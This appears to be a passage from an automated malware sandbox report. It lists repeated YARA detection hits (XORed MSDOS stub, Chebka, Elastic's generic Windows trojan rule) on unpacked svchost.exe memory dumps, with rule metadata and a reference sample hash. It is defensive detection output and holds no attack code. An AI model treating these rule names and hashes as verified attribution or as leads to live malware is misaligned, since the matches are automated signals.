        Source: 25.2.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 35.0.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 35.0.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 35.0.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 18.0.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 18.0.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 18.0.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 28.2.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 28.2.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 28.2.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 30.2.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 30.2.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 30.2.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 19.2.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 19.2.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 19.2.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 36.0.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 36.0.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 36.0.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 32.2.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 32.2.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 32.2.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 29.0.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 29.0.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 29.0.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 28.2.svchost.exe.24e72070000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 28.2.svchost.exe.24e72070000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 28.2.svchost.exe.24e72070000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 33.2.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 33.2.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 33.2.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 27.0.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 27.0.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 27.0.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 25.0.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 25.0.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 25.0.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 36.0.svchost.exe.151abe70000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 36.0.svchost.exe.151abe70000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 36.0.svchost.exe.151abe70000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 20.2.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 20.2.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 20.2.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 11.2.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 11.2.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 11.2.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 20.2.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 20.2.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 20.2.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 32.0.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 32.0.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 32.0.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 22.0.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 22.0.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 22.0.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 17.0.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 17.0.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 17.0.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 28.0.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 28.0.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 28.0.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 23.2.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 23.2.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 23.2.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 36.2.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 36.2.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 36.2.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 27.0.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 27.0.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 27.0.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 37.0.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 37.0.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 37.0.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 32.2.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 32.2.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 32.2.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 7.2.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 7.2.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 7.2.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 9.2.svchost.exe.244fc400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 9.2.svchost.exe.244fc400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 9.2.svchost.exe.244fc400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 22.2.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 22.2.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 34.2.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 22.2.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 34.2.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 34.2.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 23.0.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 23.0.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
